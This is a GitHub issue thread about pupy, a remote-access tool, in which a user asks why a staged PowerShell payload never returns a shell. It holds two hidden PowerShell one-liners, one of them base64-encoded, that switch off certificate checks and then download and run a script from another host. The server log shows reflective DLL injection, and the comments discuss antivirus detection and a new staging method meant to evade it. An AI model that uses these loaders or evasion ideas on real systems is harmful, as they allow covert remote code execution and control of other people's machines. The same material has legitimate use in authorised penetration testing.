### ISSUE TITLE
Stuck on "You should have a pupy shell in few seconds from this host..."

### ISSUE THREAD

**Issue by N1kRolexx** [n1nj4sec/pupy#515]
./pupygen.py -f ps1_oneliner connect --host 192.168.0.59:5555 --transport http
[I] Credentials password: 
[+] copy/paste one of these one-line loader to deploy pupy without writing on the disk :
 --- 
powershell.exe -w hidden -noni -nop -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object System.Net.WebClient).DownloadString('https://192.168.0.59:8080/index.html')"
 --- 
powershell.exe -w hidden -noni -nop -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7AGkAZQB4ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgA1ADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AaAB0AG0AbAAnACkA
 --- 
Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy
 --- 
[+] Started http server on 0.0.0.0:8080 
[+] waiting for a connection ...

Launching PS script above on the test machine

192.168.0.185 - - [19/Oct/2017 19:02:16] "GET /index.html HTTP/1.1" 200 -
[+] Stage 1 configured for using target's proxy configuration
[+] Stage 1 configured for using SSL
[+] [Stage 1/2] Powershell script served !
192.168.0.185 - - [19/Oct/2017 19:02:16] "GET /tata.html HTTP/1.1" 200 -
[+] remote script is running in a x64 powershell process
[+] x64 dll is loaded in InvokeReflectivePEInjection script...
[C] launcher: connect
[C] launcher_args: ['--host', '192.168.0.59:5555', '--transport', 'http']
[C] debug: False
[+] Required credentials:
[+] SSL_BIND_CERT, SIMPLE_RSA_PRIV_KEY, SIMPLE_RSA_PUB_KEY
[+] 50 variables generated for dll
[+] [Stage 2/2] Powershell Invoke-ReflectivePEInjection script (with dll embedded) served!
[+] 192.168.0.185:You should have a pupy shell in few seconds from this host...

And nothing happens after. Am i doing smth in a wrong way?

**Comment by s1st3r** [comment]
Read the source code and learn how empire works too.

**Comment by N1kRolexx** [comment]
Okay

**Comment by quentinhardy** [comment]
The problem can come from AV, target's system proxy (configuration), firewall, NAT, etc

**Comment by quentinhardy** [comment]
See https://github.com/n1nj4sec/pupy/issues/497

**Comment by b2az** [comment]
@quentinhardy Most AVs are detecting this now. Im developing a new staging option for powershell. Will open a Merge Request when done.

**Comment by quentinhardy** [comment]
I think AVs don't detect pupy powershell **stages**.

For example, the last time I have tested, AVAST detects as malicious **any** powershell command with a argument **encoded**. 

**Imagine all false positives!** 

You can try to print a HELLO WORLD from powershell command line while the argument is encoded : AVAST will block the command.

**Comment by quentinhardy** [comment]
I think this issue can be closed.
